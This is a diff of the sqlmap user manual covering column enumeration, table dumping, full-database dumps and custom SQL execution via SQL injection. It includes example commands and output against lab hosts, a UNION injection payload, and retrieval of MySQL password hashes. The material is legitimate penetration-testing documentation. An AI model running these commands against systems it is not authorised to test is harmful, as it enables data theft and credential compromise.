+information about database's tables, it is possible to enumerate the list
+of columns for a specific database table.
+sqlmap also enumerates the data-type for each column.</P>
 
-<P>Example on a <B>MySQL 5.0.67</B> target:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" --columns \
-  -T users -D testdb -v 1
-
-[...]
-back-end DBMS: MySQL >= 5.0.0
-
-[hh:mm:20] [INFO] fetching columns for table 'users' on database 'testdb'
-[hh:mm:20] [INFO] fetching number of columns for table 'users' on database 'testdb'
-[hh:mm:20] [INFO] retrieved: 3
-[hh:mm:20] [INFO] retrieved: id
-[hh:mm:20] [INFO] retrieved: int(11)
-[hh:mm:21] [INFO] retrieved: name
-[hh:mm:21] [INFO] retrieved: varchar(500)
-[hh:mm:21] [INFO] retrieved: surname
-[hh:mm:21] [INFO] retrieved: varchar(1000)
-Database: testdb
-Table: users
-[3 columns]
-+---------+---------------+
-| Column  | Type          |
-+---------+---------------+
-| id      | int(11)       |
-| name    | varchar(500)  |
-| surname | varchar(1000) |
-+---------+---------------+
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
-
-<P>Example on a <B>Microsoft SQL Server 2000 Service Pack 0</B> target:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mssql/get_int.php?id=1" --columns \
-  -T users -D master -v 0
-
-Database: master
-Table: users
-[3 columns]
-+---------+---------+
-| Column  | Type    |
-+---------+---------+
-| id      | int     |
-| name    | varchar |
-| surname | varchar |
-+---------+---------+
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
-
-<P>Example on a <B>PostgreSQL 8.3.5</B> target:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/pgsql/get_int.php?id=1" --columns \
-  -T users -D public -v 0
-
-Database: public
-Table: users
-[3 columns]
-+---------+--------+
-| Column  | Type   |
-+---------+--------+
-| id      | int4   |
-| name    | bpchar |
-| surname | bpchar |
-+---------+--------+
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
-
-<P>Note that on PostgreSQL you have to provide <CODE>public</CODE> or the
-name of a system database. That's because it is not possible to enumerate 
-other databases tables, only the tables under the schema that the web
-application's user is connected to, which is always <CODE>public</CODE>.</P>
-
-<P>If the database name is not specified, the current database name is used.</P>
-
-<P>Example on a <B>MySQL 5.0.67</B> target:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" --columns \
-  -T users -v 1
-
-[...]
-back-end DBMS: MySQL >= 5.0.0
-
-[hh:mm:45] [WARNING] missing database parameter, sqlmap is going to use the current 
-database to enumerate table 'users' columns
-[hh:mm:45] [INFO] fetching current database
-[hh:mm:45] [INFO] retrieved: testdb
-[hh:mm:45] [INFO] fetching columns for table 'users' on database 'testdb'
-[hh:mm:45] [INFO] fetching number of columns for table 'users' on database 'testdb'
-[hh:mm:45] [INFO] retrieved: 3
-[hh:mm:45] [INFO] retrieved: id
-[hh:mm:45] [INFO] retrieved: int(11)
-[hh:mm:46] [INFO] retrieved: name
-[hh:mm:46] [INFO] retrieved: varchar(500)
-[hh:mm:46] [INFO] retrieved: surname
-[hh:mm:46] [INFO] retrieved: varchar(1000)
-Database: testdb
-Table: users
-[3 columns]
-+---------+---------------+
-| Column  | Type          |
-+---------+---------------+
-| id      | int(11)       |
-| name    | varchar(500)  |
-| surname | varchar(1000) |
-+---------+---------------+
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
-
-<P>You can also provide the <CODE>-C</CODE> option to specify the table columns
+<P>This feature depends on the option <CODE>-T</CODE> to specify the table name
+and optionally on <CODE>-D</CODE> to specify the database name. When the
+database name is not specified, the current database name is used.
+You can also provide the <CODE>-C</CODE> option to specify the table columns
 name like the one you provided to be enumerated.</P>
 
-<P>Example on a <B>MySQL 5.0.67</B> target:</P>
+<P>Example against a MySQL target:</P>
 <P>
 <BLOCKQUOTE><CODE>
 <PRE>
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" --columns \
-  -T users -C name -v 1
-
+$ python sqlmap.py -u "http://debiandev/sqlmap/mysql/get_int.php?id=1" --columns -D testdb \
+  -T users -C name
 [...]
-[hh:mm:20] [WARNING] missing database parameter, sqlmap is going to use the current 
-database to enumerate table 'users' columns
-[hh:mm:20] [INFO] fetching current database
-[hh:mm:20] [INFO] retrieved: testdb
-[hh:mm:20] [INFO] fetching columns like 'name' for table 'users' on database 'testdb'
-[hh:mm:20] [INFO] fetching number of columns for table 'users' on database 'testdb'
-[hh:mm:20] [INFO] retrieved: 2
-[hh:mm:20] [INFO] retrieved: name
-[hh:mm:20] [INFO] retrieved: varchar(500)
-[hh:mm:21] [INFO] retrieved: surname
-[hh:mm:21] [INFO] retrieved: varchar(1000)
 Database: testdb
 Table: users
 [2 columns]
@@ -3685,63 +1995,40 @@ Table: users
 </CODE></BLOCKQUOTE>
 </P>
 
+<P>Note that on PostgreSQL you have to provide <CODE>public</CODE> or the
+name of a system database. That's because it is not possible to enumerate 
+other databases tables, only the tables under the schema that the web
+application's user is connected to, which is always aliased by
+<CODE>public</CODE>.</P>
+
 
 <H3>Dump database table entries</H3>
 
-<P>Options: <CODE>-</CODE><CODE>-dump</CODE>, <CODE>-C</CODE>, <CODE>-T</CODE>, <CODE>-D</CODE>,
+<P>Switches: <CODE>-</CODE><CODE>-dump</CODE>, <CODE>-C</CODE>, <CODE>-T</CODE>, <CODE>-D</CODE>,
 <CODE>-</CODE><CODE>-start</CODE>, <CODE>-</CODE><CODE>-stop</CODE>, <CODE>-</CODE><CODE>-first</CODE>
 and <CODE>-</CODE><CODE>-last</CODE></P>
 
-<P>It is possible to dump table entries.
-This functionality depends on the option <CODE>-T</CODE> to specify the table
-name or on the option <CODE>-C</CODE> to specify the column name and,
-optionally on <CODE>-D</CODE> to specify the database name.</P>
+<P>When the session user has read access to a specific database's table it is
+possible to dump the table entries.</P>
 
-<P>If the table name is specified, but the database name is not, the current
+<P>This functionality depends on switch <CODE>-T</CODE> to specify the table
+name and optionally on switch <CODE>-D</CODE> to specify the database name.
+If the table name is provided, but the database name is not, the current
 database name is used.</P>
 
-<P>Example on a <B>MySQL 5.0.67</B> target:</P>
+<P>Example against a Firebird target:</P>
 <P>
 <BLOCKQUOTE><CODE>
 <PRE>
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" --dump \
-  -T users -v 1
-
+$ python sqlmap.py -u "http://debiandev/sqlmap/firebird/get_int.php?id=1" --dump -T users
 [...]
-back-end DBMS: MySQL >= 5.0.0
-
-[hh:mm:41] [WARNING] missing database parameter, sqlmap is going to use the current 
-database to dump table 'users' entries
-[hh:mm:41] [INFO] fetching current database
-[hh:mm:41] [INFO] retrieved: testdb
-[hh:mm:41] [INFO] fetching columns for table 'users' on database 'testdb'
-[hh:mm:41] [INFO] fetching number of columns for table 'users' on database 'testdb'
-[hh:mm:41] [INFO] retrieved: 3
-[hh:mm:41] [INFO] retrieved: id
-[hh:mm:41] [INFO] retrieved: name
-[hh:mm:41] [INFO] retrieved: surname
-[hh:mm:41] [INFO] fetching entries for table 'users' on database 'testdb'
-[hh:mm:41] [INFO] fetching number of entries for table 'users' on database 'testdb'
-[hh:mm:41] [INFO] retrieved: 4
-[hh:mm:41] [INFO] retrieved: 1
-[hh:mm:42] [INFO] retrieved: luther
-[hh:mm:42] [INFO] retrieved: blissett
-[hh:mm:42] [INFO] retrieved: 2
-[hh:mm:42] [INFO] retrieved: fluffy
-[hh:mm:42] [INFO] retrieved: bunny
-[hh:mm:42] [INFO] retrieved: 3
-[hh:mm:42] [INFO] retrieved: wu
-[hh:mm:42] [INFO] retrieved: ming
-[hh:mm:43] [INFO] retrieved: 4
-[hh:mm:43] [INFO] retrieved:  
-[hh:mm:43] [INFO] retrieved: nameisnull
-Database: testdb
-Table: users
+Database: Firebird_masterdb
+Table: USERS
 [4 entries]
 +----+--------+------------+
-| id | name   | surname    |
+| ID | NAME   | SURNAME    |
 +----+--------+------------+
-| 1  | luther | blissett   |
+| 1  | luther | blisset    |
 | 2  | fluffy | bunny      |
 | 3  | wu     | ming       |
 | 4  | NULL   | nameisnull |
@@ -3750,335 +2037,86 @@ Table: users
 </CODE></BLOCKQUOTE>
 </P>
 
-<P>You can also provide the <CODE>-C</CODE> option to specify the table column
-that you want to enumerate the entries.</P>
+<P>You can also provide a comma-separated list of the specific columns to
+dump with the <CODE>-C</CODE> switch.</P>
 
-<P>Example on a <B>Microsoft SQL Server 2000 Service Pack 0</B> target:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mssql/get_int.php?id=1" --dump \
-  -T users -D master -C surname -v 0
+<P>sqlmap also generates for each table dumped the entries in a CSV format
+textual file.
+You can see the absolute path where sqlmap creates the file by providing a
+verbosity level greater than or equal to <B>1</B>.</P>
 
-Database: master
-Table: users
-[5 entries]
-+-------------------+
-| surname           |
-+-------------------+
-| blisset           |
-| bunny             |
-| ming              |
-| nameisnull        |
-| user agent header |
-+-------------------+
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
+<P>If you want to dump only a range of entries, then you can provide switches
+<CODE>-</CODE><CODE>-start</CODE> and/or <CODE>-</CODE><CODE>-stop</CODE> to respectively
+start to dump from a certain entry and stop the dump at a certain entry.
+For instance, if you want to dump only the first entry, provide
+<CODE>-</CODE><CODE>-stop 1</CODE> in your command line. Vice versa if, for
+instance, you want to dump only the second and third entry, provide
+<CODE>-</CODE><CODE>-start 1</CODE> <CODE>-</CODE><CODE>-stop 3</CODE>.</P>
 
-<P>If only the column name is specified, sqlmap will enumerate and ask the
-user to dump all databases' tables containing user provided column(s).
-This feature can be useful to identify, for instance, tables containing
-custom application credentials.</P>
+<P>It is also possible to specify which single character or range of characters
+to dump with switches <CODE>-</CODE><CODE>-first</CODE> and <CODE>-</CODE><CODE>-last</CODE>.
+For instance, if you want to dump columns' entries from the third to the
+fifth character, provide <CODE>-</CODE><CODE>-first 3</CODE> <CODE>-</CODE><CODE>-last
+5</CODE>.
+This feature only applies to the blind SQL injection techniques because for
+error-based and UNION query SQL injection techniques the number of requests
+is exactly the same, regardless of the length of the column's entry output
+to dump.</P>
 
-<P>Example on a <B>MySQL 5.0.67</B> target:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" -v 1 --dump \
-  -C "urna"
-
-[...]
-back-end DBMS: MySQL >= 5.0.0
-
-do you want sqlmap to consider provided column(s):
-[1] as LIKE column names (default)
-[2] as exact column names
-> 1
-[hh:mm:08] [INFO] fetching databases with tables containing columns like 'urna'
-[hh:mm:08] [INFO] fetching number of databases with tables containing columns like 
-'urna'
-[hh:mm:08] [INFO] retrieved: 1
-[hh:mm:08] [INFO] retrieved: testdb
-[hh:mm:10] [INFO] fetching tables containing columns like 'urna' in database 'testdb'
-[hh:mm:10] [INFO] fetching number of tables containing columns like 'urna' in 
-database 'testdb'
-[hh:mm:10] [INFO] retrieved: 1
-[hh:mm:10] [INFO] retrieved: users
-[hh:mm:10] [INFO] fetching columns like 'urna' for table 'users' on database 'testdb'
-[hh:mm:10] [INFO] fetching number of columns for table 'users' on database 'testdb'
-[hh:mm:10] [INFO] retrieved: 1
-[hh:mm:10] [INFO] retrieved: surname
-Columns like 'urna' were found in the following databases:
-Database: testdb
-Table: users
-[1 column]
-+---------+
-| Column  |
-+---------+
-| surname |
-+---------+
-
-do you want to dump entries? [Y/n] y
-which database(s)?
-[a]ll (default)
-[testdb]
-[q]uit
-> 
-which table(s) of database 'testdb'?
-[a]ll (default)
-[users]
-[s]kip
-[q]uit
-> 
-[hh:mm:23] [INFO] fetching columns 'surname' entries for table 'users' on 
-database 'testdb'
-[hh:mm:23] [INFO] fetching number of columns 'surname' entries for table 
-'users' on database 'testdb'
-[hh:mm:23] [INFO] retrieved: 4
-[hh:mm:23] [INFO] retrieved: blissett
-[hh:mm:23] [INFO] retrieved: bunny
-[hh:mm:23] [INFO] retrieved: ming
-[hh:mm:23] [INFO] retrieved: nameisnull
-Database: testdb
-Table: users
-[4 entries]
-+------------+
-| surname    |
-+------------+
-| blissett   |
-| bunny      |
-| ming       |
-| nameisnull |
-+------------+
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
-
-<P>sqlmap also stores for each table the dumped entries in a CSV format file.
-You can see the absolute path where sqlmap stores the dumped tables entries
-by providing a verbosity level greater than or equal to 1.</P>
-
-<P>Example on a <B>PostgreSQL 8.3.5</B> target:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/pgsql/get_int.php?id=1" --dump \
-  -T users -D public -v 1
-
-[...]
-Database: public
-Table: users
-[5 entries]
-+----+----------------------------------------------+-------------------+
-| id | name                                         | surname           |
-+----+----------------------------------------------+-------------------+
-| 1  | luther                                       | blissett          |
-| 2  | fluffy                                       | bunny             |
-| 3  | wu                                           | ming              |
-| 4  | sqlmap/0.8 (http://sqlmap.sourceforge.net)   | user agent header |
-| 5  |                                              | nameisnull        |
-+----+----------------------------------------------+-------------------+
-
-[hh:mm:59] [INFO] Table 'public.users' dumped to CSV file '/home/inquis/sqlmap/output/
-172.16.213.131/dump/public/users.csv'
-[...]
-
-$ cat ./output/172.16.213.131/dump/public/users.csv 
-id,name,surname
-"1","luther","blissett"
-"2","fluffy","bunny"
-"3","wu","ming"
-"4","sqlmap/0.8 (http://sqlmap.sourceforge.net)","user agent header"
-"5","","nameisnull"
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
-
-<P>You can also provide the <CODE>-</CODE><CODE>-start</CODE> and/or the <CODE>-</CODE><CODE>-stop</CODE>
-options to limit the dump to a range of entries, while those entries can be further
-limited to a range of character positions provided with <CODE>-</CODE><CODE>-first</CODE> 
-and/or the <CODE>-</CODE><CODE>-last</CODE> options:</P>
-<P>
-<UL>
-<LI><CODE>-</CODE><CODE>-start</CODE> specifies the first entry to enumerate.</LI>
-<LI><CODE>-</CODE><CODE>-stop</CODE> specifies the last entry to enumerate.</LI>
-</UL>
-</P>
-
-<P>Example on a <B>MySQL 5.0.67</B> target:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" --dump \
-  -T users -D testdb --start 2 --stop 4 -v 0
-
-Database: testdb
-Table: users
-[3 entries]
-+----+--------------------------------------------+-------------------+
-| id | name                                       | surname           |
-+----+--------------------------------------------+-------------------+
-| 2  | fluffy                                     | bunny             |
-| 3  | wu                                         | ming              |
-| 4  | sqlmap/0.8 (http://sqlmap.sourceforge.net) | user agent header |
-+----+--------------------------------------------+-------------------+
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
-
-<P>As you can see, sqlmap is very flexible. You can leave it to automatically
-enumerate the whole database table up to a range of characters of a single
-column of a specific table entry.</P>
+<P>As you know by down, sqlmap is <B>flexible</B>. You can leave it to
+automatically enumerate the whole database table or you can be very
+precise in which characters to dump, from which columns and which range of
+entries.</P>
 
 
 <H3>Dump all databases tables entries</H3>
 
-<P>Options: <CODE>-</CODE><CODE>-dump-all</CODE> and <CODE>-</CODE><CODE>-exclude-sysdbs</CODE></P>
+<P>Switches: <CODE>-</CODE><CODE>-dump-all</CODE> and <CODE>-</CODE><CODE>-exclude-sysdbs</CODE></P>
 
-<P>It is possible to dump all databases tables entries at once.</P>
-<P>Example on a <B>MySQL 5.0.67</B> target:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" --dump-all -v 0
+<P>It is possible to dump all databases tables entries at once that the
+session user has read access on.</P>
 
-Database: testdb
-Table: users
-[5 entries]
-+----+--------------------------------------------+-------------------+
-| id | name                                       | surname           |
-+----+--------------------------------------------+-------------------+
-| 1  | luther                                     | blissett          |
-| 2  | fluffy                                     | bunny             |
-| 3  | wu                                         | ming              |
-| 4  | sqlmap/0.8 (http://sqlmap.sourceforge.net) | user agent header |
-| 5  | NULL                                       | nameisnull        |
-+----+--------------------------------------------+-------------------+
-
-Database: information_schema
-Table: CHARACTER_SETS
-[36 entries]
-+--------------------+----------------------+-----------------------------+--------+
-| CHARACTER_SET_NAME | DEFAULT_COLLATE_NAME | DESCRIPTION                 | MAXLEN |
-+--------------------+----------------------+-----------------------------+--------+
-| tis620             | tis620_thai_ci       | TIS620 Thai                 | 1      |
-| macroman           | macroman_general_ci  | Mac West European           | 1      |
-| dec8               | dec8_swedish_ci      | DEC West European           | 1      |
-| ujis               | ujis_japanese_ci     | EUC-JP Japanese             | 3      |
-| eucjpms            | eucjpms_japanese_ci  | UJIS for Windows Japanese   | 3      |
-| armscii8           | armscii8_general_ci  | ARMSCII-8 Armenian          | 1      |
-| ucs2               | ucs2_general_ci      | UCS-2 Unicode               | 2      |
-| hp8                | hp8_english_ci       | HP West European            | 1      |
-| latin2             | latin2_general_ci    | ISO 8859-2 Central European | 1      |
-| koi8u              | koi8u_general_ci     | KOI8-U Ukrainian            | 1      |
-| keybcs2            | keybcs2_general_ci   | DOS Kamenicky Czech-Slovak  | 1      |
-| ascii              | ascii_general_ci     | US ASCII                    | 1      |
-| cp866              | cp866_general_ci     | DOS Russian                 | 1      |
-| cp1256             | cp1256_general_ci    | Windows Arabic              | 1      |
-| macce              | macce_general_ci     | Mac Central European        | 1      |
-| sjis               | sjis_japanese_ci     | Shift-JIS Japanese          | 2      |
-| geostd8            | geostd8_general_ci   | GEOSTD8 Georgian            | 1      |
-| cp1257             | cp1257_general_ci    | Windows Baltic              | 1      |
-| cp852              | cp852_general_ci     | DOS Central European        | 1      |
-| euckr              | euckr_korean_ci      | EUC-KR Korean               | 2      |
-| cp1250             | cp1250_general_ci    | Windows Central European    | 1      |
-| cp1251             | cp1251_general_ci    | Windows Cyrillic            | 1      |
-| binary             | binary               | Binary pseudo charset       | 1      |
-| big5               | big5_chinese_ci      | Big5 Traditional Chinese    | 2      |
-| gb2312             | gb2312_chinese_ci    | GB2312 Simplified Chinese   | 2      |
-| hebrew             | hebrew_general_ci    | ISO 8859-8 Hebrew           | 1      |
-| koi8r              | koi8r_general_ci     | KOI8-R Relcom Russian       | 1      |
-| greek              | greek_general_ci     | ISO 8859-7 Greek            | 1      |
-| cp850              | cp850_general_ci     | DOS West European           | 1      |
-| utf8               | utf8_general_ci      | UTF-8 Unicode               | 3      |
-| latin1             | latin1_swedish_ci    | cp1252 West European        | 1      |
-| latin7             | latin7_general_ci    | ISO 8859-13 Baltic          | 1      |
-| cp932              | cp932_japanese_ci    | SJIS for Windows Japanese   | 2      |
-| latin5             | latin5_turkish_ci    | ISO 8859-9 Turkish          | 1      |
-| swe7               | swe7_swedish_ci      | 7bit Swedish                | 1      |
-| gbk                | gbk_chinese_ci       | GBK Simplified Chinese      | 2      |
-+--------------------+----------------------+-----------------------------+--------+
-
-[...]
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
-
-<P>You can also provide the <CODE>-</CODE><CODE>-exclude-sysdbs</CODE> option to exclude all
-system databases. In that case sqlmap will only dump entries of users' databases
-tables.</P>
-
-<P>Example on a <B>Microsoft SQL Server 2000 Service Pack 0</B> target:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mssql/get_int.php?id=1" --dump-all \
-  --exclude-sysdbs -v 0
-
-Database: master
-Table: spt_datatype_info_ext
-[10 entries]
-+----------------+-----------------+-----------+-----------+
-| AUTO_INCREMENT | CREATE_PARAMS   | typename  | user_type |
-+----------------+-----------------+-----------+-----------+
-| 0              | length          | char      | 175       |
-| 0              | precision,scale | numeric   | 108       |
-| 0              | max length      | varbinary | 165       |
-| 0              | precision,scale | decimal   | 106       |
-| 1              | precision       | numeric   | 108       |
-| 0              | length          | nchar     | 239       |
-| 0              | max length      | nvarchar  | 231       |
-| 0              | length          | binary    | 173       |
-| 0              | max length      | varchar   | 167       |
-| 1              | precision       | decimal   | 106       |
-+----------------+-----------------+-----------+-----------+
-
-[...]
-
-Database: master
-Table: users
-[5 entries]
-+----+----------------------------------------------+-------------------+
-| id | name                                         | surname           |
-+----+----------------------------------------------+-------------------+
-| 4  | sqlmap/0.8 (http://sqlmap.sourceforge.net)   | user agent header |
-| 2  | fluffy                                       | bunny             |
-| 1  | luther                                       | blisset           |
-| 3  | wu                                           | ming              |
-| 5  | NULL                                         | nameisnull        |
-+----+----------------------------------------------+-------------------+
-
-[...]
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
+<P>You can also provide the <CODE>-</CODE><CODE>-exclude-sysdbs</CODE> switch to
+exclude all system databases. In that case sqlmap will only dump entries
+of users' databases tables.</P>
 
 <P>Note that on Microsoft SQL Server the <CODE>master</CODE> database is not
 considered a system database because some database administrators use it
 as a users' database.</P>
 
 
-<H3>Execute custom SQL statement</H3>
+<H3>Search for columns, tables or databases</H3>
 
-<P>Options: <CODE>-</CODE><CODE>-sql-query</CODE> and <CODE>-</CODE><CODE>-sql-shell</CODE></P>
+<P>Switches: <CODE>-</CODE><CODE>-search</CODE>, <CODE>-C</CODE>, <CODE>-T</CODE>, <CODE>-D</CODE></P>
 
-<P>The SQL query and the SQL shell features makes the user able to execute
-custom SQL statements on the web application's back-end database
-management.
+<P>TODO</P>
+
+
+<H3>Run custom SQL statement</H3>
+
+<P>Switches: <CODE>-</CODE><CODE>-sql-query</CODE> and <CODE>-</CODE><CODE>-sql-shell</CODE></P>
+
+<P>The SQL query and the SQL shell features allow to run arbitrary SQL
+statements on the database management system.
 sqlmap automatically dissects the provided statement, determines which
-technique to use to inject it and how to pack the SQL payload accordingly.</P>
-<P>If it is a <CODE>SELECT</CODE> statement, sqlmap will retrieve its output
-through the blind SQL injection or UNION query SQL injection technique
-depending on the user's options. Otherwise it will execute the query
-through the stacked query SQL injection technique if the web application
-supports multiple statements on the back-end database management system.</P>
+technique is appropriate to use to inject it and how to pack the SQL
+payload accordingly.</P>
 
-<P>Examples on a <B>Microsoft SQL Server 2000 Service Pack 0</B> target:</P>
+<P>If the query is a <CODE>SELECT</CODE> statement, sqlmap will retrieve its
+output.
+Otherwise it will execute the query through the stacked query SQL
+injection technique if the web application supports multiple statements on
+the back-end database management system.
+Beware that some web application technologies do not support stacked
+queries on specific database management systems. For instance, PHP does
+not support stacked queries when the back-end DBMS is MySQL, but it does
+support when the back-end DBMS is PostgreSQL.</P>
+
+<P>Examples against a Microsoft SQL Server 2000 target:</P>
 <P>
 <BLOCKQUOTE><CODE>
 <PRE>
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mssql/get_int.php?id=1" --sql-query \
+$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mssql/get_int.php?id=1" --sql-query \
   "SELECT 'foo'" -v 1
 
 [...]
@@ -4086,7 +2124,7 @@ $ python sqlmap.py -u "http://172.16.213.131/sqlmap/mssql/get_int.php?id=1" --sq
 [hh:mm:14] [INFO] retrieved: foo
 SELECT 'foo':    'foo'
 
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mssql/get_int.php?id=1" --sql-query \
+$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mssql/get_int.php?id=1" --sql-query \
   "SELECT 'foo', 'bar'" -v 2
 
 [...]
@@ -4106,347 +2144,49 @@ SELECT 'foo', 'bar':    'foo, bar'
 </CODE></BLOCKQUOTE>
 </P>
 
-<P>As you can see from the last example, sqlmap splits provided query into two
-different <CODE>SELECT</CODE> statements for it to be able to retrieve the 
-output even in case when using the blind SQL injection technique.
-Otherwise, in UNION query SQL injection technique it only performs a single
-HTTP request to get the user's query output:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mssql/get_int.php?id=1" --sql-query \
-  "SELECT 'foo', 'bar'" -v 2 --union-use
+<P>As you can see, sqlmap splits the provided query into two different
+<CODE>SELECT</CODE> statements then retrieves the output for each separate
+query.</P>
 
-[...]
-[hh:mm:03] [INFO] fetching SQL SELECT query output: 'SELECT 'foo', 'bar''
-[hh:mm:03] [INFO] testing inband sql injection on parameter 'id' with NULL bruteforcing 
-technique
-[hh:mm:03] [INFO] the target url could be affected by an inband sql injection vulnerability
-[hh:mm:03] [INFO] confirming full inband sql injection on parameter 'id'
-[hh:mm:03] [INFO] the target url is affected by an exploitable full inband sql injection
-vulnerability
-[hh:mm:03] [DEBUG] query:  UNION ALL SELECT NULL, (CHAR(77)+CHAR(68)+CHAR(75)+CHAR(104)+
-CHAR(70)+CHAR(67))+ISNULL(CAST((CHAR(102)+CHAR(111)+CHAR(111)) AS VARCHAR(8000)), (CHAR(32)))
-+(CHAR(105)+CHAR(65)+CHAR(119)+CHAR(105)+CHAR(108)+CHAR(108))+ISNULL(CAST((CHAR(98)+CHAR(97)+
-CHAR(114)) AS VARCHAR(8000)), (CHAR(32)))+(CHAR(66)+CHAR(78)+CHAR(104)+CHAR(75)+CHAR(114)+
-CHAR(116)), NULL-- AND 8373=8373
-[hh:mm:03] [DEBUG] performed 3 queries in 0 seconds
-SELECT 'foo', 'bar' [1]:
-[*] foo, bar
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
+<P>If the provided query is a <CODE>SELECT</CODE> statement and contains a
+<CODE>FROM</CODE> clause, sqlmap will ask you if such statement can return
+multiple entries. In that case the tool knows how to unpack the query
+correctly to count the number of possible entries and retrieve its output,
+entry per entry.</P>
 
-<P>If your <CODE>SELECT</CODE> statement contains a <CODE>FROM</CODE> clause, sqlmap
-asks the user if such statement can return multiple entries. In that
-case the tool knows how to unpack the query correctly to retrieve its
-whole output, entry per entry, when going through blind SQL injection
-technique. In provided example, UNION query SQL injection it retrieved 
-the whole output in a single response.</P>
-
-<P>Example on a <B>PostgreSQL 8.3.5</B> target:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/pgsql/get_int.php?id=1" --sql-query \
-  "SELECT usename FROM pg_user" -v 0
-
-[hh:mm:32] [INPUT] can the SQL query provided return multiple entries? [Y/n] y
-[hh:mm:37] [INPUT] the SQL query provided can return up to 3 entries. How many entries 
-do you want to retrieve?
-[a] All (default)
-[#] Specific number
-[q] Quit
-Choice: 2
-SELECT usename FROM pg_user [2]:
-[*] postgres
-[*] testuser
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
-
-<P>As you can see from the last example, sqlmap counts the number of entries
-for a given query and asks for number of entries to dump.
-Otherwise, if the <CODE>LIMIT</CODE> is also specified, or similar clause,
-sqlmap will not ask for anything. It will just unpack the query and return its
-output, entry per entry, when going through blind SQL injection technique.
-In a given example, sqlmap used UNION query SQL injection to retrieve the 
-whole output in a single response.</P>
-
-<P>Example on a <B>MySQL 5.0.67</B> target:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" --sql-query \
-  "SELECT host, password FROM mysql.user LIMIT 1, 3" -v 2
-
-[...]
-back-end DBMS:  MySQL >= 5.0.0
-
-[hh:mm:22] [INFO] fetching SQL SELECT statement query output: 'SELECT host, password FROM 
-mysql.user LIMIT 1, 3'
-[hh:mm:22] [INFO] the SQL query provided has more than a field. sqlmap will now unpack it 
-into distinct queries to be able to retrieve the output even if we are going blind
-[hh:mm:22] [DEBUG] query: SELECT IFNULL(CAST(host AS CHAR(10000)), CHAR(32)) FROM 
-mysql.user LIMIT 1, 1
-[hh:mm:22] [INFO] retrieved: localhost
-[hh:mm:22] [DEBUG] performed 69 queries in 0 seconds
-[hh:mm:22] [DEBUG] query: SELECT IFNULL(CAST(password AS CHAR(10000)), CHAR(32)) FROM 
-mysql.user LIMIT 1, 1
-[hh:mm:22] [INFO] retrieved: *00E247AC5F9AF26AE0194B41E1E769DEE1429A29
-[hh:mm:24] [DEBUG] performed 293 queries in 2 seconds
-[hh:mm:24] [DEBUG] query: SELECT IFNULL(CAST(host AS CHAR(10000)), CHAR(32)) FROM 
-mysql.user LIMIT 2, 1
-[hh:mm:24] [INFO] retrieved: localhost
-[hh:mm:25] [DEBUG] performed 69 queries in 0 seconds
-[hh:mm:25] [DEBUG] query: SELECT IFNULL(CAST(password AS CHAR(10000)), CHAR(32)) FROM 
-mysql.user LIMIT 2, 1
-[hh:mm:25] [INFO] retrieved: *00E247AC5F9AF26AE0194B41E1E769DEE1429A29
-[hh:mm:27] [DEBUG] performed 293 queries in 2 seconds
-[hh:mm:27] [DEBUG] query: SELECT IFNULL(CAST(host AS CHAR(10000)), CHAR(32)) FROM 
-mysql.user LIMIT 3, 1
-[hh:mm:27] [INFO] retrieved: localhost
-[hh:mm:28] [DEBUG] performed 69 queries in 0 seconds
-[hh:mm:28] [DEBUG] query: SELECT IFNULL(CAST(password AS CHAR(10000)), CHAR(32)) 
-FROM mysql.user LIMIT 3, 1
-[hh:mm:28] [INFO] retrieved: 
-[hh:mm:28] [DEBUG] performed 6 queries in 0 seconds
-SELECT host, password FROM mysql.user LIMIT 1, 3 [3]:
-[*] localhost, *00E247AC5F9AF26AE0194B41E1E769DEE1429A29
-[*] localhost, *00E247AC5F9AF26AE0194B41E1E769DEE1429A29
-[*] localhost, 
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
-
-<P>The SQL shell option gives you an access to run your own SQL statement
